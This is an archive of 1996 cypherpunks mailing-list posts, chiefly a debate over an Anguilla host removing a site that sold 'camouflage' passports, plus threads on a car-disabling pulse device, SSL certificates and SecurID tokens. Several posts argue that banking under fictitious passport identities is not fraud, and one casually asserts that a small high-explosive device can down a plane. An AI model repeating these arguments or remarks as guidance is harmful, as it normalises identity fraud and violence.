>does not think they are "fake", but the rest of the world does.  He also
>suggested opening up bank accounts with these fake passports (encouraging
>fraud).

"What is truth?" Many of the things customers of a data haven are likely to
be doing are "fraudulent" or "illegal" in some jurisdictions....I'm sure I
don't have to spend effort here citing examples from religious, medical,
and business domains.

(But I can't resist: vitamin data the U.S. calls fraudulent, political
information about Ireland the U.K. calls illegal, sex information the
government of Iran punishes with death, and so on.)

Selling fake passports seems not to be something Vince ought to even be
paying attention to. Granted, pressure from outside states may put pressure
on Vince, but this actually confirms my worst (OK, _nearly_ my worst)
suspicions about the viability of such data havens.

>My lawyer called me up and told me that fake passports are illegal in
>Anguilla and that I should pull this guy immediately.  I did. It is our
>policy to not permit anything on our servers that is illegal in Anguilla.
>My lawyer is where I get the definition of "illegal in Anguilla".

Instead of "pulling" this guy, did you first send a copy of your lawyer's
letter to you to this guy, and advise him that he should remove just this
one specific item, the allegedly illegal British Honduras passports?


>Tim:
>>I'd guess that Vince has had a fun time in the Carribbean, but that he'll
>>be closing up shop sometime soon. Once some services are yanked, confidence
>>is lost.
>
>I am not closing up at all.  Anything that is legal in Anguilla can be
>done from my servers.  If not, then not.  Note that there are no taxes
>here, and there are still many things a guy can do here that are not
>permitted in other places.  However, fake passports turns out not to be
>one of them.

Then I suggest you carefully provide a full copy of what you consider to be
illegal to all subscribers. Or give subscribers a time period to remove the
_specific_ items that are deemed to be illegal.

I have some questions, though. Would bomb-making instructions be legal or
illegal, acceptable or not acceptable on your system? How about "Kill the
Queen" screeds? And so on.

Sorry to put you on the spot, Vince, but a "data haven" is by its nature
going to have a lot of "unusual" material, to use a euphemism. Everything
from Bell's bids for having government officials offed, to plans for sale
on creating false identiites, to crypto anarchy manifestos advocating the
destruction of democracies.

If you "pull" the entire account of a business when the Governor-General,
or His Royal Excellency--or whomever it is that runs Anguilla--applies
pressure....well, you won't have much of a real data haven, now will you?

Could you actually give us an idea of what is considered legal to run in
Anguilla, and what is not? How about dial-a-porn sites? (I seem to recall
mention from you or a visitor that "Penthouse" is not permitted to be sold
in Anguilla, so....)

How about gambling? How about assassination markets? (Is it legal in
Anguila if no residents or citizens of Anguilla are included in the
"game"?)

And so on.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 11 Aug 1996 17:18:26 +0800
To: cypherpunks@toad.com
Subject: Where is the fraud? (re: Anguilla)
Message-ID: <ae32d230050210045227@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



One more thing....

At 12:53 AM 8/11/96, Vincent Cate wrote:

>This is a fraud by taxbomber.  He is totally involved with selling fake
>passports.  He calls them "camouflage passports" and they have names like
>"British Honduras" of countries that no longer exist, or never did.  He
>does not think they are "fake", but the rest of the world does.  He also
>suggested opening up bank accounts with these fake passports (encouraging
>fraud).

On this last point, how is this "encouraging fraud"?

If I deposit money in a bank and choose to identify myself as "Mickey
Mouse, Citizen of the Magic Kingdom," perhaps even presenting a Disneyland
Passport, who is being defrauded?

Is the bank being defrauded? Not if Mickey is depositing money. What if the
bank is _lending_ money to Mickey? Then of course they might find that the
"Magic Kingdom" is not a real country, and that Mickey's "passport" was not
issued by one of the 192 godfearing countries in the United Nations. So
what? Then they deny the loan.

Where is the fraud? Is Anguilla in the business of determining what a True
Name is? (What is it, by the way?) I should remind readers that it is legal
to sell such passports in the U.S....somewhere I have one that says "This
document not good for travel in the People's Republics of Berkeley, Santa
Monica, and Madison," or somesuch.

Again, which specific law in Anguilla specifies which pieces of paper may
be bought and sold? Does the law say an actual crime or case of fraud has
to occur, or is only the potentiality of a crime or fraud involved? Does
the crime or fraud have to occur in Anguilla?

Inquiring minds want to know.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sun, 11 Aug 1996 01:16:48 +0800
To: cypherpunks@toad.com
Subject: Police prepare stunning end for high-speed car chases
Message-ID: <199608101504.RAA03459@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Police prepare stunning end for high-speed car chases 

                                    BY GILES WHITTELL 
                                    AND NIGEL HAWKES 

         IT COULD be the end of the car chase as we know it. With the automotive equivalent of
         a stun gun, science fiction is coming to the aid of law enforcement. 

         A high-powered electrical device under development at the Pentagon's Army Research
         Laboratory in Adelphi, Maryland, is to be tested by police and border patrol agents and
         could be in use by next year. 

         The car stopper works by focusing an intense electromagnetic charge on the electronic
         systems that manage most modern engines, disabling them and paralysing the car. In
         the jargon of its inventors, the 150 kilovolt charge is a nemp, or non-nuclear
         electromagnetic pulse. Contractors are bidding to produce a police version. 

         Very precisely directed beams are required, but even then there will be problems. A
         pulse powerful enough to disable an engine at any reasonable range would also be likely
         to disrupt communications, damage television and radio sets, disable computers and
         even stop heart pacemakers. There is also the danger of loss of control when a car is
         being driven at high speed. 

         Counter-measures would include using old-fashioned engines with no electronics, or
         perhaps surrounding the most delicate components with shielding. The best might be to
         get hold of one of the stun guns and use it to disable pursuing police vehicles. 


Original article at http://www.the-times.co.uk/news/pages/Times/timnwsnws01022.html?1060389

Three questions come to mind:

	Will old fashioned engines be outlawed?
	Will the "stun guns" be outlawed?
	Will susceptible electronic systems become mandatory?
	(and if so, why not just put a remote control switch in all cars?)


Gary




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 11 Aug 1996 08:17:55 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla Censors taxBomber ..... ??
In-Reply-To: <4uimq2$n4n@life.ai.mit.edu>
Message-ID: <320D01F1.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> As of immediately, the "taxBomber's Site & Internet Offshore Center"
> has been pulled by our Anguilla provider and will remain inaccessible
> for a few days.


Before people get too carried away the site is still up and appears
to have been up all along. Of course it would be a convenient ploy
to advertise a site of this type by claiming to have been censored.


I had a look at their wares and was not impressed. The diplomatic
passport and "second passport" offers are somewhat pricey at
$10 to $20K. Note that a diplomatic passport does not convey any
status or privileges unless the holders credentials have been 
accepted by host state. "non-revenue producing investments" will
be familliar to anyone who has traded extensively in that area. 

Note that no country in the world offers such passports openly, to
do so would be contrary to a number of international conventions. 

There has been the long running case of the South African immigration
laws which meant that whites used to get citizenship whether they 
wanted it or not after a stay of about six months. Its possible that
it hasn't been repealed. 

Note that the statement that the trade is illegal is countered by
the assertion that the documents are genuine. Its very easy to obtain
genuine documents if the right bribes are paid. That does not make
a scheme legal. 


The various licenses etc appear to be avaliable on condition that you
provide them with appropriate statements as to eligibility. If you
apply for the student's card in this way and you are not a student 
you are committing fraud. If you are willing to do that you can get
a student ID card much more easily - go to any branch of British 
Rail in the UK and you can have one for a few quid.


Similarly the various other "offers" tend to be priced rather high. If
you know what the card is being offered you can probably get it legit
much cheaper.  

The piece de resistance is the offer of an EU driving license to 
peoplke from Ireland, Netherlands etc for only $680. Its the same
goddam license! Just go to your embassy and ask them to replace your
current license for an EU pink 'un.


All in all stay well clear.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 11 Aug 1996 12:48:13 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <4uefdh$12o@life.ai.mit.edu>
Message-ID: <320D0B63.167E@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  In addition
> to the "exceptions," there was no penalty for violation of the
> law, thus making sure it was unenforceable.  It was not a case
> of "pro-gun fascism" but of rough American political humor.  At
> the very least it kept the city council out of more serious
> mischief.

Was there a bar against a person obtaining an injunction to
force someone to purchase a gun or a provision providing that
no liabilities would be incurred as a result of not owning one?

The law is much too important to start abusing to make political
points.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sun, 11 Aug 1996 13:06:47 +0800
To: cypherpunks@toad.com
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <4ufqum$ihk@life.ai.mit.edu>
Message-ID: <320D0C1E.2781@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:

> Quite a while back, I read an article in National Rifleman (the NRA
> magazine), that for part of  the 19th century  it was the law that all
> adult men in the Balkan statelet of Montenegro must carry a pistol
> when in public (a close relative of the ruler had a monopoly on the
> manufacture and sale of firearms in the kingdom).
> 
> Traveler's reports noted the extreme civility of Montenegrin
> society during this period.

Yes and what happened in the early part of the 20th century
with respect to that area of Europe?

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 11 Aug 1996 13:26:23 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Imprisoned for Not Having a Gun?
In-Reply-To: <320D0B63.167E@ai.mit.edu>
Message-ID: <199608102237.SAA10457@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hallam-Baker writes:
> The law is much too important to start abusing to make political
> points.

An excellent argument for libertarianism, Mr. Hallam-Baker.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 11 Aug 1996 03:08:52 +0800
To: cypherpunks@toad.com
Subject: testAnguilla Censors taxBomber ..... ??
Message-ID: <199608101716.TAA05459@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


As of immediately, the "taxBomber's Site & Internet Offshore Center"
has been pulled by our Anguilla provider and will remain inaccessible
for a few days.

This is the work of some journalist hacks who did a major job of
character assassination by claiming that we (and our provider)
were involved in selling fake passports.

This tactics isn't exactly new or particularly original:

The Argentine press pulled a similar stunt in April, and again our
provider was pressurized to cut us off from the Web without
notice.

Needless to say, we have NEVER EVER dealt in one single fake
passport, nor have we ever offered, sold or brokered any forged,
stolen or "lost" documents. Nor is there any need to do so, if you can
get the real thing absolutely legally.

But of course, this is a political rather than a legal issue - we
were, and still are, too successful for Big Brother's liking: on our
site, ordinary people (i.e. no govt. or intelligence agency personnel)
got loads of free information on *legally* saving taxes, protecting
their assets and reffectivel guarding their privacy. While we were
and still are a commercial operation, we always made a point of being
as educative and topically exhaustive as our resources would permit.

But now, it seems, little Anguilla is getting "worried about its
international reputation".

Well, they are right, though with a vengeance: the reputation they
have most certainly lost as of today is that being of one of the
world's last truly liberal tax and data havens ...

Now for the good news: we will set up a provisional site elsewhere
soon and will announce it here on Usenet.

Still - if anyone knows of an operational site provider *outside* US
and EU jurisdiction, please drop us a line.  Your support would be
greatly appreciated and full credits given, if you so wish.
We will probably either set up a worldwide network of fallback and
mirror sites or continue our work in a new, truly innovative way to
effectively counter any censorship and dependency on site providers.

Until then, you can (still) email us at:

pt@taxbomber.com

or post your request (users permitting) to "alt.privacy",
which we will be scanning regularly.

Sorry for the inconvenience - hope to see you again soon!

the taxBomber





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 11 Aug 1996 14:21:05 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: An SSL implementation weakness?
In-Reply-To: <Pine.LNX.3.94.960809045202.653D-100000@switch.sp.org>
Message-ID: <Pine.SUN.3.91.960810193128.13080B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


This was the second SSL problem documented; it was fixed in 
netscape 2.0. The fix is to include the hostnames used for the server in 
the certificate as multi-values for the CommonName (CN). 

The fix is relatively simple; The client must then check the certificate
to make sure the hostname matches, and the CA must not check ownership of
domain names before issuing certs. 

Simon
(the first, and silliest was the original SSL's habit of using RC4 on 
(essentially) known plain-text with no checksum. Doh!) 

 ---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 11 Aug 1996 14:57:58 +0800
To: cypherpunks@toad.com
Subject: Re: Going Postal (Was: Boom!)
Message-ID: <199608110037.RAA10125@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


(Regarding the one pound limit on anonymous parcels)

At 08:13 AM 8/9/96 -0700, David.K.Merriman@toad.com, wrote:
> Don't know that I'm a 'bomb expert', but it would appear reasonable that 6 
> just-under-a-pound bombs would do approximately as much damage as a 
> similarly sized larger device.

As was pointed out earlier in this thread, a one pound device containing 
high explosive can drop a plane out of the sky as if it was swatting a fly.

Note that any moron can make high explosive, though the average moron 
has a good chance of blowing himself up in the process.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 11 Aug 1996 14:37:10 +0800
To: i am not a number! <geeman@best.com>
Subject: Re: photographed license plates
In-Reply-To: <320B5805.712E@best.com>
Message-ID: <Pine.SUN.3.91.960810194513.13080C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


In the UK they now use cameras to deter speeding; the cameras are 
triggered by vehicles passing by which exceed the speed-limit, so in 
theory it's only naughty people who get photographed. Interestingly 
enough, there are far more places with camera warning signs than there 
are actual cameras; the actual cameras are moved around at random. Even 
though most of the time there isn't a camera there, almost everbody 
seemed to slow down in the marked areas; probably because there's almost 
100% chance of being caught if there is a camera there. 



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 11 Aug 1996 14:21:30 +0800
To: Gary Howland <cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <2.2.32.19960810235220.00a455fc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Time to fire up the '57 Chevy.


At 05:04 PM 8/10/96 +0200, Gary Howland wrote:
>Police prepare stunning end for high-speed car chases 
>
>                                    BY GILES WHITTELL 
>                                    AND NIGEL HAWKES 
>
>         IT COULD be the end of the car chase as we know it. With the
automotive equivalent of
>         a stun gun, science fiction is coming to the aid of law enforcement. 
>
>         A high-powered electrical device under development at the
Pentagon's Army Research





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 11 Aug 1996 14:39:44 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: Fw: SafE Mail Corporation
In-Reply-To: <Pine.GUL.3.95.960809175133.15098C-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960810195344.13080E-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 9 Aug 1996, Rich Graves wrote:
> I notice they've "sweetened" their "hacker" deal for cracking their
> software. Now it's an all-expense-paid trip to North Carolina plus about
> $400. Still not worth it, unless you're just pissed off.

Come on, it'd be worth it even without the $400...

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | IN WASHINGTON DC TILL SEPTEMBER
You're my firewall -    	      | 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 11 Aug 1996 14:20:52 +0800
To: cypherpunks@toad.com
Subject: Rumors of death of Anguilla Data are greatly exagerated.
Message-ID: <Pine.LNX.3.91.960810204259.1326A@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Taxbomber wrote:
>This is the work of some journalist hacks who did a major job of
>character assassination by claiming that we (and our provider)
>were involved in selling fake passports.

This is a fraud by taxbomber.  He is totally involved with selling fake
passports.  He calls them "camouflage passports" and they have names like
"British Honduras" of countries that no longer exist, or never did.  He
does not think they are "fake", but the rest of the world does.  He also
suggested opening up bank accounts with these fake passports (encouraging
fraud).

My lawyer called me up and told me that fake passports are illegal in
Anguilla and that I should pull this guy immediately.  I did. It is our
policy to not permit anything on our servers that is illegal in Anguilla. 
My lawyer is where I get the definition of "illegal in Anguilla". 

Tim:
>(I assume this is Vince Cates' site, though I haven't doublechecked...

Yes, taxbomber was using Offshore Information Services.

Tim:
>Longterm, I've never believed there is much safety in locating in *any*
>physical country. (By this I mean advertising and making it clear that one
>is in Country X, said to be "friendly" to tax avoiders, data havens, money
>laundering, etc. 

As a practical matter, taxbomber would have been better off to not state
what country his web site was currently in, let alone who the provider
was.  This reporter seems not to even use email, and I doubt he would know
how to locate a sites provider. 

Tim:
>I'd guess that Vince has had a fun time in the Carribbean, but that he'll
>be closing up shop sometime soon. Once some services are yanked, confidence
>is lost.

I am not closing up at all.  Anything that is legal in Anguilla can be
done from my servers.  If not, then not.  Note that there are no taxes
here, and there are still many things a guy can do here that are not
permitted in other places.  However, fake passports turns out not to be
one of them. 

Sameer:
> Note that the taxbomber site is moving to a provider in the US.

Actually, at the moment http://www.taxbomber.com/ is off in Europe
someplace.  The US provider has been slow to come up with an IP address. 
:-)

   --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 11 Aug 1996 16:14:16 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <v02120d01ae3326ad34cd@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:16 8/10/96, Anonymous wrote:
>Why don't they just have government access to car engines?  They could
>just require car manufacturers to include remote shutdown devices for
>the engines.

But they will. Didn't you know that?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sun, 11 Aug 1996 08:06:28 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
In-Reply-To: <199608101504.RAA03459@internal-mail.systemics.com>
Message-ID: <199608102116.XAA23230@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Why don't they just have government access to car engines?  They could
just require car manufacturers to include remote shutdown devices for
the engines.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Sun, 11 Aug 1996 15:05:07 +0800
To: cypherpunks@toad.com
Subject: Anguilla / taxbomber  - legality
Message-ID: <Pine.LNX.3.91.960811004757.1724B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



I meant to quote this part in the previous post:

taxbomber:
>Needless to say, we have NEVER EVER dealt in one single fake
>passport, nor have we ever offered, sold or brokered any forged,
>stolen or "lost" documents. Nor is there any need to do so, if you can
>get the real thing absolutely legally.

He was definately selling fake passports.   He thinks of them as
camouflage.  If I look up fake in websters, they fit the definition.

Turns out this is not legal in Anguilla.

If it is no longer in his web page, you can see quotes from his web
page in the David Evans article.

The Internet spans many counties and if something is not legal in one
country but legal in another, someone can move.   He has moved.
One of the exciting things about the Internet.  

If there are taxes in your country and banks cooperate with the
government, you can incorporate in Anguilla, put your web site here, and
run your business from here (coming in over the Internet) tax free. 

But fraud is illegal in Anguilla, and fake passports are concidered
fraud.

   -- Vince
 
     http://online.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Sun, 11 Aug 1996 16:02:09 +0800
To: pjb@ny.ubs.com (Paul J. Bell)
Subject: Re: SecurID
Message-ID: <v02130504ae314de8a9fc@[206.243.160.206]>
MIME-Version: 1.0
Content-Type: text/plain


        Paul J. Bell <pjb@ny.ubs.com> gave a desperate shout for help:

>someone at my firm is about to press the securid system down our collective
>throats. please point me to the recent thread on this subject, and/or point
>me to some url's or the like, or to someone who has some firsthand
>knowledge of the pitfalls and/or vulnerbilities of secirid.

        I think Enigma Logic, Digital Pathways, and Cryptocard -- all
vendors of competitive one-time passsword (OTP) tokens --have diatribes
against the ACE/SecurID system on their web sites.  Check them out.  Over
the past two years, there have also been a number of fairly in-depth
debates about SecurIDs and the ACE protocols on the Firewalls mailing list
(ftp the archives at greatcircle.com) and in comp.security.unix. My SecurID
FAQ, available from SDTI at <http://www.securid.com> might give you ideas
too.

        Most people find the SecurID (and most of its competitors)
relatively well-designed and and secure devices.  Most of the negative
comment I've seen is from competitors who say the SecurID and it's ACE
support system is too expensive, and from ACE administrators who gripe that
the software is not optimized for their favorite platform.  It is
unfortunately true that SDTI  has not yet mastered the knack of producing
perfectly bugless code. Earlier this year SDTI also fouled up badly when
they failed to bring their Customer Support operation up to speed to
support a new generation of authentication servers (ACE 2.X) which involved
a relatively more complex Unix installation.  They've spent a lot of money
and hired a lot of people, but I don't think there is yet a consensus about
whether they've licked that.

        Still, some people think they get their money's worth.  SecurID is
the OTP token of choice at most (80 percent +) large corporate sites --in a
market with a lot of competitors, including well-done freeware OTP
alternatives: s/key and OPIE.  Of course, those buyers could all be wrong.

          SDTI's success is really built on the fact that users -- the
people who actually carry the tokens -- usually say they like the SecurID
better than the alternatives.  The SecurID claims the lion's share of the
market  because it is relatively intuitive and easy to use: the PIN and
token-code can be typed in like a (long) traditional password.  The
alternative tokens -- all challenge/response devices -- force the user to
engage in a multi-step process to get a random challenge from the remote
host, tap it into the token, encrypted it, then send it back to the host as
the OTP.

      SecurIDs are supported by an ACE authentication server which  --
alone among the OTP vendors -- holds its Access Control files in a
commercial-grade SQL-savvy relational database, which means that can be
interlinked with HR or any other SQL-savvy corporate RDBS.  As the industry
sets the stage for enterprise-wide IP security (hopefully soon to include
crypto) many  believe the authentication server's capabilities become more
important than the token's design.

        But, hey, those folks could be wrong.

        SDTI also just bought RSA Data Security, which some feel enhances
its prospects for making some further contribution to enterprise security.
Even before that, some 50 of the leading independent vendors of
network-based products (from firewalls and comm servers to big databases)
had chosen to integrate ACE/SecurID client code into a huge variety of
products.  This is a fairly unprecidented level of industry support -- but
they might be all wrong too.

        ACE/SecurID is notable among other OTP systems for both its support
infrastructure (STDI supported the client/server architecture five years
before any other OTP vendor,) and because it is a (patent-protected)
time-synched device: the 30/60-second dynamic token-code the SecurID
displays is a hash of Current Time and a token-specific secret seed. This
has pros and cons (honest,  both pros and cons;-)

        Unfortunately, what ACE/SecurID does not do -- what no OTP can do
-- is safeguard or secure your communications links.  (It also does not
minimize the need for ongoing system administration; capable auditing and
oversight; or an explicit local security policy -- all of which can also be
burdensome to the user.  But the real bear is network security.)  On an
unprotected network or telephone link -- in the face of a sophisticated
attack -- nothing but  network-level crypto or link encryption can stave
off either eavesdropping or active TCP "session stealing."

        (Several of SDTI's strategic partners do provide encrypted tunnels
through open networks. There are even some well-regarded freeware or
shareware options.) SecurIDs, like any OTP, only identifies the guy who
knocks on the front door.  This is useful; it's even important -- but it's
not enough.  Most environments need (but don't have) crypto too.  But even
in the face of this acknowledged threat -- session hijacking -- many sites
still find it useful to invest in OTP tokens, often SecurIDs.  They do this
because:

        * OTPs can offer a more-certain two-factor authentication
(something known; something held);
        * OTPs foil a whole array of trojan and sniffer-based attacks which
seek to collect the passwords of innocent users like yourself; and
        * OTPs can raise a partial barrier against network-based attacks.

        Effectively, OTPs force most network-based attacks to become
overt... so the user and/or sysadmin has a chance to recognize that
something is wrong and react defensively.

        Some believe the ACE/SecurID system actually does a little better
than that. The ACE protocol encrypts all packets containing user
authentication data as it passes between the ACE/Clients (often embedded
communication servers of various types) and the ACE/Server.  This
establishes an encrypted virtual net for authentication data with the user
site, which blocks another class of attacks.

        In an ACE/SecurID-protected environment, the threat of
network-based attacks is thus somewhat constained.  Authentication calls,
and the TCP/IP sessions they authorize, remain quite vulnerable if they are
transmitted over the Internet, or an extended private network, or telephone
links susceptable to physical wiretaps.  OTPs safeguard the authentication
calls against replay attacks --and most of the race attacks seem managable
-- but unencrypted sessions ultimately remain vulnerable to both
eavesdropping and session hijacking

        In many corporations, however, only a fraction of the data traffic
travels on these high-risk links.  While there are net-based attacks that
might reach in to grab unencrypted message traffic on your internal LAN (Is
someone is also trying to force a firewall on you guys too, PJ?) within the
ACE client/server environment, at least user authentication data -- name,
OTP, and PIN --  seems to be securely encrypted.  Not that there aren't
hackers -- and cynical system administrators -- probing and testing it
daily.

        Rumors and dark suspicious whispers abound, as seems inevitable
with any successful product that relies on crypto. (Actually, any widely
used computer security product -- have you noticed?) Personally, I find it
reassuring to remember that for virtually every flaw there is, inevitably,
a fix.  But then, Wall Street's recent soaring climbs and plunging drops
remind me of just how potent rumors can be.

        Please come back and tell us if you find any real dirt, Mr. Bell.
(And please pardon the blithe spirit that infected my comments. It's just
hard to play the straight man on a Saturday summer night.)  Also, an
obligatory avowal:  SDTI regularly pays me huge sums of money for
information and advice, but they ignore at least half of what I say.

        You can too.

        Suerte,
                        _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Aug 1996 04:47:54 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
Message-ID: <ae337a8400021004b45e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:20 PM 8/11/96, Perry E. Metzger wrote:
>Timothy C. May writes:
>> Selling fake passports seems not to be something Vince ought to even be
>> paying attention to. Granted, pressure from outside states may put pressure
>> on Vince, but this actually confirms my worst (OK, _nearly_ my worst)
>> suspicions about the viability of such data havens.
>
>Vince has the right to run his business any way he likes.

Of course. I never said otherwise, so this is a straw man argument.

Ditto for remailers, ISPs, bookstores, blah blah blah. But this does not
mean people should say nothing about what they learn the practices to be.

>In some jurisdictions, "Fake" passports are legal. In some, they are
>illegal. Vince feels that in his jurisdiction they are illegal. He has
>every right to decide who to allow to run off of his web servers --
>even to be arbitrary about it.

Of course. I never said otherwise.

Those of us who have commented are not challenging his legal right to do
so, only remarking that if he cancels accounts without stronger legal
evidence, or without making it clear what is acceptable and what is not, he
risks losing reptuation capital.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Sun, 11 Aug 1996 20:07:25 +0800
To: cypherpunks@toad.com
Subject: Police prepare stunning e
Message-ID: <TCPSMTP.16.8.11.5.51.56.2645935021.661159@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> IT COULD be the end of the car chase as we know it. With the
 In> automotive equivalent of a stun gun, science fiction is coming
 In> to the aid of law enforcement.  
 In> A high-powered electrical device under development at the
 In> Pentagon's Army Research Laboratory in Adelphi, Maryland, is
 In> to be tested by police and border patrol agents and could be
 In> in use by next year.  
 In> The car stopper works by focusing an intense electromagnetic
 In> charge on the electronic systems that manage most modern
 In> engines, disabling them and paralysing the car. In the jargon
 In> of its inventors, the 150 kilovolt charge is a nemp, or non-nuclear
 In> electromagnetic pulse. Contractors are bidding to produce a
 In> police version.  
 In> Very precisely directed beams are required, but even then
 In> there will be problems. A pulse powerful enough to disable an
 In> engine at any reasonable range would also be likely to disrupt
 In> communications, damage television and radio sets, disable computers
 In> and even stop heart pacemakers. There is also the danger of
 In> loss of control when a car is being driven at high speed. 

 In> Counter-measures would include using old-fashioned engines
 In> with no electronics, or perhaps surrounding the most delicate
 In> components with shielding. The best might be to get hold of
 In> one of the stun guns and use it to disable pursuing police vehicles.  

 Is there any dif between this and a HERF gun?


 P.J.
 pjn@nworks.com



... RAM DISK is NOT an installation procedure!

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "What we're dealing with here is a blatant disrespect of the law!" <mudge@l0pht.com>
